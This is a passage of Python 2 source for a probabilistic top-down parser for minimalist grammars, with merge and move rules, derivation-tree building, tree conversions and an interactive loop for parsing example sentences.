safe_fs = fs[:] # make a copy
if len(fs)>0:
rifs = [intsOfF(sl,f) for f in reversed(safe_fs)]
return (ss,rifs)
else:
return (ss,fs)
"""
examples:
item0=(['hi'],[])
revItem(sA0,item0)
item0=(['the'],[('sel','N'),('cat','D')])
revItem(sA0,item0)
"""
# some functions for print out
def lexTree2stringTree(sA,t):
if len(t)>0 and isinstance(t[0],tuple):
root = btfyFeat(fOfInts(sA,t[0]))
subtrees = lexTrees2stringTrees(sA,t[1:])
return [root]+subtrees
else:
return t
"""
example (using lA0 which is defined below):
intsOfF(sA0,('cat','D'))
lA0[0]
lexTree2stringTree(sA0,[intsOfF(sA0,('cat','D'))]+lA0[0])
"""
def lexTrees2stringTrees(sA,ts):
return [lexTree2stringTree(sA,t) for t in ts]
# to get trees in the array, insert the root feature determined by the index
def lexArrays2lexTrees((sA,lA,tA)):
return [ ([(tA[i],i)]+lA[i]) for i in range(len(sA)) ]
"""
example: lexArrays2lexTrees((sA0,lA0,tA0))
"""
def lexArrays2stringTrees((sA,lA,tA)):
return lexTrees2stringTrees(sA,lexArrays2lexTrees((sA,lA,tA)))
"""
example:
lexArrays2stringTrees((sA0,lA0,tA0))
"""
def findRoot(f,trees): # find subtree with root matching f, if there is one
for i,t in enumerate(trees):
if (isinstance(t,list) and len(t)>0 and t[0]==f):
return i
return -1
def revItemIntoLexTrees(lst, (ss,fs)):
for f in fs:
i = findRoot(f,lst)
if i>=0:
lst = lst[i]
else:
lst.append([f])
lst = lst[-1]
lst.append(ss)
"""
lexTreeList0 = []
item0=(['the'],[('sel','N'),('cat','D')])
revItem0 = revItem(sA0,item0)
revItemIntoLexTrees(lexTreeList0,revItem0)
item1=(['a'],[('sel','N'),('cat','D')])
revItem1 = revItem(sA0,item1)
revItemIntoLexTrees(lexTreeList0,revItem1)
item2=(['who'],[('sel','N'),('cat','D'),('neg','wh')])
revItem2 = revItem(sA0,item2)
revItemIntoLexTrees(lexTreeList0,revItem2)
item3=(['says'],[('sel','C'),('sel','D'),('cat','V')])
revItem3 = revItem(sA0,item3)
revItemIntoLexTrees(lexTreeList0,revItem3)
"""
def gIntoLexTreeList(sA,g):
lexTrees = []
for ri in [revItem(sA,i) for i in g]:
revItemIntoLexTrees(lexTrees,ri)
return lexTrees
"""
example:
ts0 = gIntoLexTreeList(sA0,mg0)
t0 = ['.']+ts0
ts2 = gIntoLexTreeList(sA2,mg2)
t2 = ['.']+ts2
list2nltktree(t0).draw()
That tree has the integer representation of the categories,
but now it's easy to "beautify" the features:
"""
def list2btfytree(sA,listtree):
if listtree==[]:
return []
else:
subtrees=[list2btfytree(sA,e) for e in listtree[1:]]
if isinstance(listtree[0],tuple):
root = btfyFeat(fOfInts(sA,listtree[0]))
else:
root = listtree[0]
return Tree(root,subtrees)
"""
list2btfytree(sA0,t0)
list2btfytree(sA0,t0).draw()
TreeView(list2btfytree(sA0,t0))
['V', 'C', 'wh', 'N', 'D']
"""
"""
Let's put those lexTrees in order, so that the subtree
with root type (i,j) appears in lA[j] and has feature type tA[j]=i.
Since lists are arrays in python, these lists will let us
get these values with simple O(1) lookup.
"""
def gIntoLexArrayTypeArray(sA,g):
lst = gIntoLexTreeList(sA,g)
lexArray = [[]]*len(sA)
typeArray = [0]*len(sA)
for t in lst:
# print t
(i,j)=t[0]
lexArray[j]=t[1:]
typeArray[j]=i
return (lexArray,typeArray)
"""
example:
(lA0,tA0) = gIntoLexArrayTypeArray(sA0,mg0)
lexArrays0 = (sA0,lA0,tA0)
(lA2,tA2) = gIntoLexArrayTypeArray(sA2,mg2)
lexArrays2 = (sA2,lA2,tA2)
check: OK
t2 = ['.']+lexArrays2stringTrees((sA2,lA2,tA2))
TreeView(list2nltktree(st2))
"""
def btfyIndex(lst):
return ''.join([str(i) for i in lst])
def printCatI((ts,ixs)):
for (t,i) in zip(ts,ixs):
pptree(t)
print i,',',
def nonEmptyMover((tree,index)): # a tree with just a root is "empty"
return len(tree) > 1
def deleteEmpties((movertrees,moverIndices)):
result = zip(*filter(nonEmptyMover,zip(movertrees,moverIndices)))
if result==[]:
return ([],[])
else:
return result
def printIcat((sA,lA,tA),((h,mA),(ih,iA),dt)):
ihS = btfyIndex(ih)
iASs = [btfyIndex(i) for i in iA]
hTs = lexTrees2stringTrees(sA,h) # nb: h is a tree list
mTs = lexArrays2stringTrees((sA,mA,tA)) # mA an array of tree lists
for t in hTs:
pptree(t)
print ihS,',',
printCatI(deleteEmpties((mTs,iASs)))
"""
example:
def testic0():
h=lA0[0]
m=[[]]*len(sA0)
mx=[[]]*len(sA0)
hx=[0,1,1]
m[2]=lA0[2]
mx[2]=[0,0]
dt = ([],[],[])
return ((h,m),(hx,mx),dt)
ic0 = testic0()
printIcat((sA0,lA0,tA0),ic0,dt)
"""
"""
Now consider minheaps. Lists also have a min function
l1=[4,1,3,2]
min(l1)
But insert/extract_min are O(n) on lists, and much faster (O(log n)) on heaps.
l1=[4,1,3,2]
heapq.heapify(l1)
The usual length and access-by-position still works:
len(l1)
l1[0]
l1[1]
More importantly, we can pop the minimum element, and
push new elements:
heapq.heappop(l1)
len(l1)
safe_l1 = l1[:]
len(safe_l1)
heapq.heappop(l1)
len(l1)
len(safe_l1)
heapq.heappop(safe_l1)
heapq.heappush(l1,0)
heapq.heappop(l1)
heapq.heappop(l1)
heapq.heappop(l1)
heapq.heappop(l1)
"""
"""
Since heapq is not set up to let us define what counts as "least",
we will put (minIndex,ic) pairs onto the heap, so heappop will give
us the predicted indexed category ic with the smallest index,
using the standard ordering.
minIndex should only check indices of filled mover positions.
No mover has an empty index, so we can ignore them.
"""
def minIndex(((h,m),(hx,mx),dt)):
min = hx
for x in mx:
if x<>[] and x<min:
min=x
return min
def printIQ(lexArrays,iq):
for (i,ic) in iq:
printIcat(lexArrays,ic)
print '... end ic'
"""
example:
exactly as before, but now with (min_index,ic) elements,
using ic0 defined above:
iq0 = [(minIndex(ic0),ic0)]
heapq.heapify(iq0)
len(iq0)
printIQ(lexArrays0,iq0)
heapq.heappush(iq0,(minIndex(ic0),ic0))
len(iq0)
printIQ(lexArrays0,iq0)
"""
def printIQ(lexArrays,iq):
for (i,ic,d) in iq: # d is "dtuple" for this indexed category
printIcat(lexArrays,ic)
print '... end ic'
"""
For the queue of parses, we put the probability first, and negate it,
(-probability,input,iq)
so the most probable element will be the most negative, and hence the
minimal element popped at each step.
"""
"""
Our last preparatory steps are the utilities for building the
derivation tree. Gorn addresses for each node of the derivation tree
are stored during the parse, together with the lexical labels of the
leaves. From these, we can compute the standard form of the derivation tree.
"""
def splitDnodes(nontermsSofar,termsSoFar,dns):
for dn in dns:
if isinstance(dn,tuple): # a terminal is a pair (node,terminal string list)
termsSoFar.append(dn)
else:
nontermsSofar.append(dn) # node is an integer list
def child(n1,n2): # boolean: is n1 a prefix of n2? If so: n2 is a child of n1
return n1 == n2[0:len(n1)]
# build the derivation tree that has parent as its root, and return it
def buildIDtreeFromDnodes(parent,nodes,terminals,t):
if len(terminals)>0 and min(terminals)[0]==parent:
leaf = heapq.heappop(terminals)
t.append(leaf[1])
elif len(nodes)>0 and child(parent,min(nodes)):
root = heapq.heappop(nodes)
t.append(['.']) # place-holder
t = t[-1]
child0 = buildIDtreeFromDnodes(root,nodes,terminals,t)
if len(nodes)>0 and child(parent,min(nodes)):
t[0]='*' # replace place-holder
root1 = heapq.heappop(nodes)
child1 = buildIDtreeFromDnodes(root1,nodes,terminals,t)
else:
t[0]='o' # replace place-holder
else:
raise RuntimeError('buildIDtreeFromDnodes: error')
return t
"""
example:
t000 = []
root00 = []
nts00 = [[0],[0,0],[0,1],[1],[1,0]]
heapq.heapify(nts00)
ts00 = [([0,0],[('the',[(0,0)])]), ([0,1],[('bird',[(0,0)])]), ([1,0],[('sings',[(0,0)])])]
heapq.heapify(ts00)
t00 = []
t000 = buildIDtreeFromDnodes(root00,nts00,ts00,t00)
pptree(t000)
"""
def dNodes2idtree(dns):
nonterms = []
terms = []
splitDnodes(nonterms,terms,dns)
if len(nonterms) == 0:
raise RuntimeError('buildIDtreeFromDnodes: error')
else:
heapq.heapify(nonterms)
heapq.heapify(terms)
root = heapq.heappop(nonterms)
t = buildIDtreeFromDnodes(root,nonterms,terms,[])
if len(terms)<>0 or len(nonterms)<>0:
print 'dNodes2idtree error: unused derivation steps'
print 'terms=',terms
print 'nonterms=',nonterms
return t
"""
Now to the guts of the parser.
For the queue of parses, we put the probability first, and negate it,
(-probability,input,iq)
so the most probable element will be the most negative, and hence the
minimal element popped at each step.
"""
def printDQ(lexArrays,dq):
for (p,inpt,iq,dns) in dq: # dns is the dnode list
print p,': ',' '.join(inpt)
printIQ(lexArrays,iq)
print ' ---- end parse'
"""
dq0=[(-0.1,['this','is','the','input'],iq0)]
heapq.heapify(dq0)
printDQ(lexArrays0,dq0)
heapq.heappush(dq0,(-0.1,['this','is','the','input'],iq0))
len(dq0)
printDQ(lexArrays0,dq0)
"""
def emptyListArray(m):
result = True
for e in m:
if e<>[]:
result = False
return result
"""
Check to make sure the mover array (or any array)
consists only of empty lists
example:
emptyListArray([[],[],[]])
emptyListArray([[],[],[1]])
"""
def terminalsOf(ts):
terms=[]
nonterms=[]
for t in ts:
if len(t)>0 and isinstance(t[0],tuple):
nonterms.append(t)
else:
terms.append(t)
return (terms,nonterms)
"""
Divide the list of trees ts into the terminals (lexical elements)
and the nonterminals
example: terminalsOf(lA0[0])
"""
"""
prefixT(w,input) returns (True,n) if input[:n]=w
else returns (False,0) if w not a prefix of input
"""
def prefixT(w,lst):
if w==lst[0:len(w)]:
return (True,len(w))
else:
return (False,0)
"""
memberFval(i,lst) returns (True,t) if t is an element of lst such that
root of t is (type,i); else (False,[]) if no match
"""
def memberFval(i,lst):
for pos,e in enumerate(lst):
if e[0][1]==i:
return (True,lst[pos])
return (False,[])
"""
Now the parsing steps: scan, merge1/2/3/4, move1/2
"""
def scan(w,inpt,m,mx,dt,sofar):
if emptyListArray(sofar):
(ok,remainderInt) = prefixT(w,inpt)
if ok:
exp = (w,[(([],m),([],mx),dt)]) # unlike recognizer, we return w here
sofar.append(exp)
# merge a (non-moving) complement
def merge1(lA,inpt,terms,i,((h,m),(hx,mx),dt),sofar): # dt=(ifs,dx,mifs)
if terms <> []:
new_head_index=hx[:]
new_head_index.append(0)
new_comp_index=hx[:]
new_comp_index.append(1)
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs
dx = dt[1][:] # copy
dx.append(0) # extend dx
empty_mifs = [[]]*len(m)
dt1 = (ifs,dx,empty_mifs)
ic1 = ((terms,empty_m),(new_head_index,empty_mx),dt1) # no movers to lexical head
new_ifs = [(0,i)]
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
mifs = dt[2][:] # copy
dt2 = (new_ifs,new_dx,mifs) # movers to complement
ic2 = ((lA[i],m),(new_comp_index,mx),dt2) # movers to complement only
exp = ([],[ic1,ic2])
sofar.append(exp)
# merge a (non-moving) specifier
def merge2(lA,inpt,nonterms,i,((h,m),(hx,mx),dt),sofar): # dt=(ifs,dx,mifs)
if nonterms <> []:
new_head_index=hx[:]
new_head_index.append(1)
new_comp_index=hx[:]
new_comp_index.append(0)
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs
dx = dt[1][:] # copy
dx.append(0) # extend dx
mifs = dt[2][:] # copy
dt1 = (ifs,dx,mifs)
ic1 = ((nonterms,m),(new_head_index,mx),dt1) # movers to head
new_ifs = [(0,i)]
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
empty_mifs = [[]]*len(m)
dt2 = (new_ifs,new_dx,empty_mifs)
ic2 = ((lA[i],empty_m),(new_comp_index,empty_mx),dt2) # no movers to spec
exp = ([],[ic1,ic2])
sofar.append(exp)
# merge a (moving) complement
def merge3(inpt,terms,i,((h,m),(hx,mx),dt),sofar):
if terms <> []:
for nxt in range(len(m)):
(ok,matchingTree) = memberFval(i,m[nxt])
if ok:
ts = matchingTree[1:]
tsx = mx[nxt]
ifs0 = dt[2][nxt][:]
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
empty_mifs = [[]]*len(m)
n = m[:]
nx = mx[:]
nifs = dt[2][:] # copy
n[nxt] = [] # we used the "next" licensee, so now empty
nx[nxt] = []
nifs[nxt] = []
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs with (sel i)
dx = dt[1][:] # copy
dx.append(0) # extend dx
dt1 = (ifs,dx,empty_mifs)
ic1 = ((terms,empty_m),(hx,empty_mx),dt1)
ifs0.append((0,i)) # add (cat i) feature
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
dt2 = (ifs0,new_dx,nifs) # movers to complement
ic2 = ((ts,n),(tsx,nx),dt2) # movers passed to complement
exp = ([],[ic1,ic2])
sofar.append(exp)
# merge a (moving) specifier
def merge4(inpt,nonterms,i,((h,m),(hx,mx),dt),sofar):
if nonterms <> []:
for nxt in range(len(m)):
(ok,matchingTree) = memberFval(i,m[nxt])
if ok:
ts = matchingTree[1:]
tsx = mx[nxt]
ifs0 = dt[2][nxt][:] # copy
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
empty_mifs = [[]]*len(m)
n = m[:]
nx = mx[:]
nifs = dt[2][:]
n[nxt] = [] # we used the "next" licensee, so now empty
nx[nxt] = []
nifs[nxt] = []
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs
dx = dt[1][:] # copy
dx.append(0) # extend dx
dt1 = (ifs,dx,nifs)
ic1 = ((nonterms,n),(hx,nx),dt1)
ifs0.append((0,i))
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
dt2 = (ifs0,new_dx,empty_mifs)
ic2 = ((ts,empty_m),(tsx,empty_mx),dt2) # movers passed to complement
exp = ([],[ic1,ic2])
sofar.append(exp)
def move1(lA,inpt,ts,i,((h,m),(hx,mx),dt),sofar):
if m[i] == []: # SMC
n = m[:]
nx = mx[:]
n[i] = lA[i]
nx[i] = hx[:]
nx[i].append(0)
new_head_index=hx[:]
new_head_index.append(1)
ifs = dt[0][:] # copy
ifs.append((3,i)) # extend ifs with (pos i)
dx = dt[1][:] # copy
dx.append(0) # extend dx
mifs = dt[2][:] # copy
mifs[i] = [(2,i)] # begin new mover with (neg i)
dt1 = (ifs,dx,mifs)
ic1 = ((ts,n),(new_head_index,nx),dt1)
exp = ([],[ic1])
sofar.append(exp)
def move2(inpt,ts,i,((h,m),(hx,mx),dt),sofar):
for nxt in range(len(m)):
(ok,matchingTree) = memberFval(i,m[nxt])
if ok:
rootF = matchingTree[0][1] # value of rootLabel
if rootF==nxt or m[rootF]==[]: # SMC
mts = matchingTree[1:][:]
mtsx = mx[nxt][:]
ifs0 = dt[2][nxt][:]
n = m[:]
nx = mx[:]
nifs = dt[2][:]
n[nxt] = [] # we used the "next" licensee, so now empty
nx[nxt] = []
nifs[nxt] = []
n[rootF] = mts
nx[rootF] = mtsx
ifs0.append((2,i)) # extend prev ifs of mover with (neg i)
nifs[rootF] = ifs0
ifs = dt[0][:]
ifs.append((3,i)) # extend ifs with (pos i)
dx = dt[1][:]
dx.append(0) # extend dx
dt1 = (ifs,dx,nifs)
ic1 = ((ts,n),(hx,nx),dt1)
exp = ([],[ic1])
sofar.append(exp)
"""
The following function collects all expansion of the leftmost
indexed category ((h,m),(hx,mx),dt) popped off the iq of predictions
that pops off dq -- the most probable derivation
"""
def exps((sA,lA,tA),inpt,((h,m),(hx,mx),dt),sofar):
for t in h:
if len(t)>0 and isinstance(t[0],tuple):
if t[0][0] == 1: # feature type 1 is 'sel'
i = t[0][1] # set i to feature value
(terms,nonterms)= terminalsOf(t[1:])
merge1(lA,inpt,terms,i,((h,m),(hx,mx),dt),sofar)
merge2(lA,inpt,nonterms,i,((h,m),(hx,mx),dt),sofar)
merge3(inpt,terms,i,((h,m),(hx,mx),dt),sofar)
merge4(inpt,nonterms,i,((h,m),(hx,mx),dt),sofar)
elif t[0][0] == 3: # feature type 3 is 'pos'
i = t[0][1] # set i to feature value
ts = t[1:]
move1(lA,inpt,ts,i,((h,m),(hx,mx),dt),sofar)
move2(inpt,ts,i,((h,m),(hx,mx),dt),sofar)
else:
raise RuntimeError('exps')
else:
scan(t,inpt,m,mx,dt,sofar)
# unlike recognizer, we pass in inpt, because now scan returns w
# and all other rules return [] as first element of exp pair
def insertNewParses(inpt,p,new_p,q,dq,dns0,exps):
for exp in exps:
# scan is a special case, identifiable by empty head
# (w,[(([],m),([],mx),(ifs,dx,mifs))]) <-- we check for that empty head
if exp[1][0][0][0]==[]:
dns = dns0[:]
w = exp[0]
ifs = exp[1][0][2][0][:] # copy
ifs.reverse()
dx = exp[1][0][2][1]
dns.append((dx,(w,ifs)))
(ok,remainderInt) = prefixT(w,inpt) # unlike recognizer, we compute remainder again
newParse = (p,inpt[remainderInt:],q,dns)
heapq.heappush(dq,newParse)
else: # put indexed categories ics onto iq with new_p
ics = exp[1]
safe_q=q[:]
dns = dns0[:]
for ic in ics: # ic = ((h,m),(hx,mx),(ifs,dx,mifs))
dx = ic[2][1]
dns.append(dx)
newIndex=minIndex(ic)
heapq.heappush(safe_q,(newIndex,ic))
newParse = (new_p,inpt,safe_q,dns)
heapq.heappush(dq,newParse)
"""
This is the core function: it pops the most probable parse,
pops the leftmost prediction from that parse,
expands that prediction in all possible ways,
pushes the new parses into the queue, and repeats,
until success or failure.
"""
def derive(lexArrays,minP,dq): # modify this to return dq, so alternative parses can be found
p = 1.0
# while len(dq) > 0 and len(dq) < 2000:
while len(dq) > 0:
# printDQ(lexArrays,dq)
(p,inpt,iq,dns) = heapq.heappop(dq)
print '# of parses in beam=',len(dq)+1,', p(best parse)=',(-1 * p)
if len(iq)==0 and len(inpt)==0:
print 'parse found'
return dns # success!
elif len(iq) > 0:
prediction = heapq.heappop(iq)
ic = prediction[1]
sofar = []
exps(lexArrays,inpt,ic,sofar)
if len(sofar) > 0:
new_p = p / float(len(sofar))
if new_p < minP:
insertNewParses(inpt,p,new_p,iq,dq,dns,sofar)
else:
print 'improbable parses discarded'
print 'no parse found'
return [[],([],(['no parse'],[]))] # failure!
"""
Convert the integer representation of features back to
the string representations for the derivation tree
"""
def idtree2dtree(sA,t):
if t[0]=='*':
dt0 = idtree2dtree(sA,t[1])
dt1 = idtree2dtree(sA,t[2])
return ['*',dt0,dt1]
elif t[0]=='o':
dt0 = idtree2dtree(sA,t[1])
return ['o',dt0]
elif isinstance(t,list) and len(t)==1:
dt0 = idtree2dtree(sA,t[0])
return dt0
else: # leaf t has the form (w,ifs)
return (t[0],[fOfInts(sA,f) for f in t[1]])
"""
Convert the derivation tree with string features
into a "beautified' derivation tree for display
"""
def dt2t(t):
if t[0]=='*':
dt0 = dt2t(t[1])
dt1 = dt2t(t[2])
return ['*',dt0,dt1]
elif t[0]=='o':
dt0 = dt2t(t[1])
return ['o',dt0]
else: # leaf t has the form (w,ifs)
return (t[0],[btfyFeat(f) for f in t[1]])
"""
Initialize and start the parse
"""
def parse(lex,start,minP,inpt): # initialize and begin
sA = stringValsOfG(lex)
(lA,tA) = gIntoLexArrayTypeArray(sA,lex)
startInt = intsOfF(sA,('cat',start))[1]
h = lA[startInt]
m = [[]]*len(sA)
mx = [[]]*len(sA)
ifs = [(0,startInt)] # for derivation tree, (int) features checked so far
dx = [] # for derivation tree, Gorn address of the current node (int list)
mifs = [[]]*len(sA) # for derivation tree, (int) features checked by each mover
dt = (ifs,dx,mifs) # dt = dtuple for derivation tree
ic = ((h,m),([],mx),dt)
iq = [([],ic)]
heapq.heapify(iq)
dq = [(-1.0,inpt,iq,[[]])]
heapq.heapify(dq)
t0 = time.time()
dns = derive((sA,lA,tA),minP,dq)
# print 'dns=',dns
t1 = time.time()
idtree = dNodes2idtree(dns)
# print 'idtree =',idtree
# print 'calling idtree2dtree(sA,',idtree,')'
dt = idtree2dtree(sA,idtree)
print t1 - t0, "seconds"
return dt
"""
these examples use merge1, merge2, merge3, move1
inpt0=['which','wine','the','queen','prefers']
parse(mg0,'C',0.001,inpt0)
inpt0=['which','wine','prefers','the','wine']
parse(mg0,'C',0.001,inpt0)
inpt0=['which','wine','the','queen','prefers']
parse(mg0,'C',0.001,inpt0)
inpt0=['the','king','knows','which','wine','the','queen','prefers']
parse(mg0,'C',0.001,inpt0)
these examples use merge1, merge2, merge4, move1
inpt0=['the','king','knows','which','queen','prefers','the','wine']
parse(mg0,'C',0.001,inpt0)
the queen says the king knows which queen prefers the wine
inpt0=['the','queen','says','the','king','knows','which','queen','prefers','the','wine']
parse(mg0,'C',0.001,inpt0)
inpt0=['a','a']
parse(mgxx,'T',0.001,inpt0)
"""
"""
Now we define some read-parse loops
"""
def go1(lex,start,minP): # initialize and begin
sA = stringValsOfG(lex)
(lA,tA) = gIntoLexArrayTypeArray(sA,lex)
gA = (sA,lA,tA)
startInt = intsOfF(sA,('cat',start))[1]
h = lA[startInt]
m = [[]]*len(sA)
mx = [[]]*len(sA)
ifs = [(0,startInt)] # for derivation tree
dx = [] # for derivation tree
mifs = [[]]*len(sA) # for derivation tree
dt = (ifs,dx,mifs) # for derivation tree
ic = ((h,m),([],mx),dt) # dt = dtuple for derivation tree
iq = [([],ic)]
heapq.heapify(iq)
goLoop(lex,(sA,lA,tA),iq,minP)
def goLoop(g,gA,iq,minP):
new_iq = iq[:]
inpt = ' '
while len(inpt)>0 and inpt[0] != 'q':
ans = raw_input(': ')
inpt = ans.split()
if len(inpt)>0 and inpt[0] == 'q':
sys.exit()
elif len(inpt)>0 and inpt[0] == 'l':
TreeView(list2nltktree(['.']+lexArrays2stringTrees(gA)))
elif len(inpt)>0 and inpt[0] == 'pl':
showGrammar(g)
else:
dq = [(-1.0,inpt,new_iq,[[]])]
heapq.heapify(dq)
go2(g,gA,iq,minP,dq)
sys.exit()
def go2(g,gA,iq,minP,dq):
t0 = time.time()
dns = derive(gA,minP,dq)
t1 = time.time()
idtree = dNodes2idtree(dns)
dt = idtree2dtree(gA[0],idtree)
print t1 - t0, "seconds"
ans = ''
while ans != 'quit':
ans = str(raw_input('(h for help): '))
if len(ans)>0 and ans[0] == 'h':
hlp()
elif len(ans)>0 and ans[0] == 'd':
list2nltktree(dt2t(dt)).draw()
elif len(ans)>0 and ans[0] == 's':
list2nltktree(st2t(dt2st(dt))).draw()
elif len(ans)>0 and ans[0] == 'b':
list2nltktree(bt2t(dt2bt(dt))).draw()
elif len(ans)>0 and ans[0] == 'x':
list2nltktree(dt2xb(dt)).draw()
elif len(ans)>0 and ans[0] == 'l':
list2nltktree(['.']+lexArrays2stringTrees(gA)).draw()
elif len(ans)>0 and ans[0] == 'n':
goLoop(g,gA,iq,minP)
elif len(ans)>0 and ans[0] == ';':
go2(g,gA,iq,minP,dq)
elif len(ans)>1 and ans[:2] == 'pd':
pptree(dt2t(dt))
elif len(ans)>1 and ans[:2] == 'ps':
pptree(st2t(dt2st(dt)))
elif len(ans)>1 and ans[:2] == 'pb':
pptree(bt2t(dt2bt(dt)))
elif len(ans)>1 and ans[:2] == 'px':
pptree(dt2xb(dt))
elif len(ans)>1 and ans[:2] == 'pg':
print
showGrammar(g)
print
elif len(ans)>1 and ans[:2] == 'pl':
pptree(['.']+lexArrays2stringTrees(gA))
elif len(ans)>0 and ans[0] == 'q':
sys.exit()
# ans = 'quit'
sys.exit()
def hlp():
print ' d for derivation tree'
print ' s for state tree'
print ' b for bare tree'
print " x for X' tree"
print ' l show the grammar as a tree'
print ' ; to search for another parse of this same input'
print ' n to type in next input'
print ' q for quit'
print
print 'or for line mode interaction:'
print ' pd for pretty-printed derivation tree'
print ' ps for pretty-printed state tree'
print ' pb for pretty-printed bare tree'
print " px for pretty-printed X' tree"
print ' pl pretty-print the grammar as a tree'
print ' pg print the grammar as a list of items'
print
"""
convert derivation tree to state tree
"""
# remember:
# fs[0] = head features, fs[0][0] = 1st feature of head, fs[0][0][0] = type of 1st feature
def merge_check(fs0,fs1):
if fs0[0][0][0] == 'sel' and fs1[0][0][0] == 'cat' and fs0[0][0][1] == fs1[0][0][1]:
newfs = [fs0[0][1:]] # remaining head1 features
if fs1[0][1:] <> []: # any remaining features from head2? If so, they're movers
newfs.append(fs1[0][1:])
newfs.extend(fs0[1:]) # add movers1
newfs.extend(fs1[1:]) # add movers2
return newfs
else:
raise RuntimeError('merge_check error')
def getMover(f,moverFeatureLists):
mover = []
remainder = []
for moverFeatureList in moverFeatureLists:
if moverFeatureList[0][1] == f:
if mover == []: # OK if we did not already find an f
mover = [moverFeatureList[1:]] # put remainder into singleton list
else: # if we find 2 f's, there is an SMC violation
raise RuntimeError('SMC violation in move_check')
else: # put others back into remainder list
remainder.extend(moverFeatureList)
if mover == []:
raise RuntimeError('getMover error: no mover found')
else:
return (mover,remainder)
def move_check(fs0):
newfs = [fs0[0][1:]] # remaining head1 features
(mover,remainder) = getMover(fs0[0][0][1],fs0[1:])
if remainder<>[]: # put features of other movers back into list, if any
newfs.append(remainder)
if mover[0]<>[]: # if this mover is movign again, put it into list too
newfs.append(mover[0]) # extend movers1 with movers2
return newfs
# if we want just the state: dt2s
def dt2s(dt):
if isinstance(dt,tuple):
return [dt[1]] # the state of leaf (w,fs) is [fs]; root of tree [[fs]]
elif dt[0]=='*': # all other states result from feature checking
fs0 = dt2s(dt[1])
fs1 = dt2s(dt[2])
fs = merge_check(fs0,fs1)
return fs
elif dt[0]=='o':
fs0 = dt2s(dt[1])
fs = move_check(fs0)
return fs
def dt2st(dt):
if isinstance(dt,tuple):
return [[dt[1]]] # the state of leaf (w,fs) is [fs]; root of tree [[fs]]
elif dt[0]=='*': # all other states result from feature checking
t0 = dt2st(dt[1])
t1 = dt2st(dt[2])
fs = merge_check(t0[0],t1[0])
return [fs,t0,t1]
elif dt[0]=='o':
t0 = dt2st(dt[1])
fs = move_check(t0[0])
return [fs,t0]
def st2t(st):
if len(st)==3: # merge
sfs = ','.join([' '.join([btfyFeat(f) for f in fs]) for fs in st[0]])
t0 = st2t(st[1])
t1 = st2t(st[2])
return [sfs,t0,t1]
elif len(st)==2: # move
sfs = ','.join([' '.join([btfyFeat(f) for f in fs]) for fs in st[0]])
t0 = st2t(st[1])
return [sfs,t0]
else: # len(st)==1: # leaf
sfs = ','.join([' '.join([btfyFeat(f) for f in fs]) for fs in st[0]])
return [sfs]
"""
convert derivation tree to bare tree -
we modify dt2s, adding the bare trees and the list of moving trees.
"""
def dt2bt(dt):
(state,bt,movers) = dt2sbt(dt)
if movers <> []:
raise RuntimeError('dt2bt error')
else:
return bt
# remember:
# fs[0] = head features, fs[0][0] = 1st feature of head, fs[0][0][0] = type of 1st feature
def merge_checkBT(fs0,fs1,bt1,m):
if fs0[0][0][0] == 'sel' and fs1[0][0][0] == 'cat' and fs0[0][0][1] == fs1[0][0][1]:
newfs = [fs0[0][1:][:]] # copy remaining head1 features
newfs.extend(fs0[1:][:]) # add movers1
newfs.extend(fs1[1:][:]) # add movers2
if fs1[0][1:] <> []: # any remaining features from head2? If so, new mover
bt1m = ('',[]) # trace
newfs.append(fs1[0][1:])
m.append((fs1[0][1:],bt1))
else:
bt1m = bt1
return (newfs,bt1m)
else:
raise RuntimeError('merge_check error')
def getMoverBT(f,moverFeatureLists,treeList):
mover = []
remainder = []
remainderTrees = []
for fs in moverFeatureLists:
if fs[0][1] == f:
if mover == []: # OK if we did not already find an f
mover = [fs[1:]] # put remainder into singleton list
else: # if we find 2 f's, there is an SMC violation
raise RuntimeError('SMC violation in move_check')
else:
remainder.extend(fs)
for (fs,t) in treeList:
if fs[0][1] == f: # return copy of moving tree
moverTree = t[:]
else: # add copy of any other trees
remainderTrees.append((fs,t[:]))
return (mover,moverTree,remainder,remainderTrees)
def move_checkBT(fs0,m):
newfs = [fs0[0][1:]] # remaining head1 features
(mover,moverTree,remainder,remainderTrees) = getMoverBT(fs0[0][0][1],fs0[1:],m)
if remainder<>[]: # put other mover features back into list, if any
newfs.append(remainder)
if mover[0]<>[]: # if this mover is moving again, put it into list too
newfs.append(mover[0]) # extend movers1 with movers2
mt = ('',[]) # trace
remainderTrees.append((mover[0],moverTree))
else:
mt = moverTree
return (newfs,mt,remainderTrees)
def dt2sbt(dt): # compute (state,bt,moving) triple
if isinstance(dt,tuple):
return ([dt[1]],dt,[]) # the state of leaf (w,fs) is [fs]; root of tree [[fs]]
elif dt[0]=='*': # all other states result from feature checking
(fs0,bt0,m0) = dt2sbt(dt[1])
(fs1,bt1,m1) = dt2sbt(dt[2])
m = m0
m.extend(m1)
(fs,bt1m) = merge_checkBT(fs0,fs1,bt1,m) # may add additional mover to m
if isinstance(bt0,tuple):
bt = ['<',bt0,bt1m]
else:
bt = ['>',bt1m,bt0]
return (fs,bt,m)
elif dt[0]=='o':
(fs0,bt0,m0) = dt2sbt(dt[1])
(fs,mt,m) = move_checkBT(fs0,m0)
bt = ['>',mt,bt0]
return (fs,bt,m)
def bt2t(bt):
if isinstance(bt,tuple): # leaf
w = ' '.join(bt[0])
sfs = ' '.join([btfyFeat(f) for f in bt[1]])
item = '::'.join([w,sfs])
return item
elif len(bt)==3: # merge
t0 = bt2t(bt[1])
t1 = bt2t(bt[2])
return [bt[0],t0,t1]
elif len(bt)==2: # move
t0 = bt2t(bt[1])
return [bt[0],t0]
else:
raise RuntimeError('bt2t')
"""
convert derivation tree to X-bar tree -
similar to the bare tree conversion
"""
def dt2xb(dt):
# (state,xb,movers,cat,lexical,cntr) = dt2sxb(dt,0)
tple = dt2sxb(dt,0)
xb = tple[1]
movers = tple[2]
cat = tple[3]
scat = cat+'P'
xb[0] = scat
if movers <> []:
raise RuntimeError('dt2xb error')
else:
return xb
